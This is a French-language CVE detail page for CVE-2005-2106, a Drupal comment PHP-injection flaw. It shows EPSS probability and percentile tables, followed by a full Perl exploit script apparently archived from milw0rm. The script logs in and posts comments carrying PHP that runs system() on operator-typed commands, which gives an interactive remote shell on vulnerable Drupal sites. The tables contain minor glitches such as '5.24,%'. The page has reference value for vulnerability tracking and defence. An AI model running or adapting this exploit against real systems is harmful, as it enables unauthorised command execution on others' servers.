CVE-2005-2106 : Détail

Le modèle EPSS produit un score de probabilité compris entre 0 et 1 (0 et 100 %). Plus la note est élevée, plus la probabilité qu'une vulnérabilité soit exploitée est grande.

Date	EPSS V0	EPSS V1	EPSS V2 (> 2022-02-04)	EPSS V3 (> 2025-03-07)	EPSS V4 (> 2025-03-17)
2022-02-06	–	–	4.48%	–	–
2022-02-13	–	–	4.48%	–	–
2022-04-03	–	–	4.48%	–	–
2022-12-25	–	–	4.48%	–	–
2023-01-01	–	–	4.48%	–	–
2023-02-26	–	–	4.48%	–	–
2023-03-12	–	–	–	3.43%	–
2023-12-24	–	–	–	3.43%	–
2024-06-02	–	–	–	3.43%	–
2024-06-09	–	–	–	3.18%	–
2024-12-08	–	–	–	3.18%	–
2024-12-22	–	–	–	4.18%	–
2025-01-12	–	–	–	3.89%	–
2025-01-19	–	–	–	3.89%	–
2025-03-18	–	–	–	–	5.24%
2025-03-18	–	–	–	–	5.24,%

Le percentile est utilisé pour classer les CVE en fonction de leur score EPSS. Par exemple, une CVE dans le 95e percentile selon son score EPSS est plus susceptible d'être exploitée que 95 % des autres CVE. Ainsi, le percentile sert à comparer le score EPSS d'une CVE par rapport à d'autres CVE.

Date	Percentile
2022-02-06	71%
2022-02-13	72%
2022-04-03	88%
2022-12-25	89%
2023-01-01	88%
2023-02-26	89%
2023-03-12	9%
2023-12-24	91%
2024-06-02	91%
2024-06-09	91%
2024-12-08	92%
2024-12-22	92%
2025-01-12	92%
2025-01-19	92%
2025-03-18	89%
2025-03-18	89%

#!/usr/bin/perl # Mon Jul 4 18:19:35 CEST 2005 dab@digitalsec.net # # DRUPAL-SA-2005-002 php injection in comments (yes, its lame) # Hax0r code here, read before execute # # Run without arguments to show the help. # # BLINK! BLINK! BLINK! BLINK! # # Feel free to port to another stupid script language (mIRC, # python, TCL or orthers), and send to securiteam (AGAIN) # # Theo, this one hasn't been tested in BSD.. yet! # infohacking: there're a lot of xss in drupal, contact me if you want # to program some exploits. # # BLINK! BLINK! BLINK! BLINK! # # # HERE YOU CAN PUT YOUR BANNER!!!! THOUSENDS OF PEOPLE IS READING THIS LINE # contact me for pricing and offerings. # # !dSR: yubiiiiii yeooooooooooo # use LWP::UserAgent; use HTTP::Cookies; use LWP::Simple; use HTTP::Request::Common "POST"; use HTTP::Response; use Getopt::Long; use strict; $| = 1; # ;1 = |$ my ($proxy,$proxy_user,$proxy_pass); my ($host,$debug,$drupal_user,$drupal_pass); my $options = GetOptions ( 'host=s' => \$host, 'proxy=s' => \$proxy, 'proxy_user=s' => \$proxy_user, 'proxy_pass=s' => \$proxy_pass, 'drupal_user=s' => \$drupal_user, 'drupal_pass=s' => \$drupal_pass, 'debug' => \$debug); &help unless ($host); while (1){ print "druppy461\$ "; my $cmd = <STDIN>; &druppy($cmd); } exit (1); # could be replaced with exit(2) sub druppy { chomp (my $cmd = shift); LWP::Debug::level('+') if $debug; my $ua = new LWP::UserAgent( cookie_jar=> { file => "$$.cookie" }); # this is a random feature $ua->agent("Morzilla/5.0 (THIS IS AN EXPLOIT. IDS, PLZ, Gr4b ME!!!"); if ($drupal_user) { # no need to exploit my ($mhost, $h); if ($host =~ /(http:\/\/.*?)\?q=/) { $mhost = $1; $h = $mhost . "?q=user/login"; } #some magic hacking here else { $host =~ /(.*?)\/.*?\//; $mhost =$1; $h = $mhost . "/user/login"; } print $h . "\n" if $debug; my $req = POST $h,[ 'edit[name]' => "$drupal_user", 'edit[pass]' => "$drupal_pass" ]; #grab these, and send to dsr! print $req->as_string() if $debug; my $res = $ua->request($req); print $res->content() if $debug; if ($res->is_redirect eq 1) { print "Logged\n" if $debug; } } $ua->proxy(['http'] => $proxy) if $proxy; my $req->proxy_authorization_basic($proxy_user, $proxy_pass) if $proxy_user; my $res = $ua->get("$host"); my $html = $res->content(); my @op; # buffer overflow here foreach (split(/\n/,$html)) { if ( m/name="op" value="(.*?)"/){ push(@op,$1); } }# xss here my $ok = 0; # globlal for admin purposes foreach my $op (@op) { my $req = POST "$host",[ 'edit[subject]' => 'test', 'edit[comment]' => "<?php print(\"BLAH\\n\");system(\"$cmd\"); print(\"BLAH\\n\"); php?>", 'edit[format]' => '2', 'edit[cid]' => "", # drupal is sick.. it doesn't need arguments 'edit[pid]' => "", # they use it to grab some statistycal information 'edit[nid]' => "", # about users conduits. Don't buy in internet using drupal 'op' => "$op" ]; print $req->as_string() if $debug; my $res = $ua->request($req); my $html = $res->content(); print $html if $debug; foreach (split(/\n/,$html)) { return if $ok gt "1"; # super hack de phrack if (/BLAH/) { $ok++; next } print "$_\n" if $ok eq "1"; # /n is for another line in screen } } } sub help { print "Syntax: ./$0 <url> [options]\n"; print "\t--drupal_user, --drupal_pass (needed if dont allow anonymous posts)\n"; print "\t--proxy (http), --proxy_user, --proxy_pass\n"; print "\t--debug\n"; print "\nExample\n"; print "bash# $0 --host=http://www.server.com/?q=comment/reply/1\n"; print "\n"; exit(1); } #sub 0day_solaris { # please put your code here #} # milw0rm.com [2005-07-05]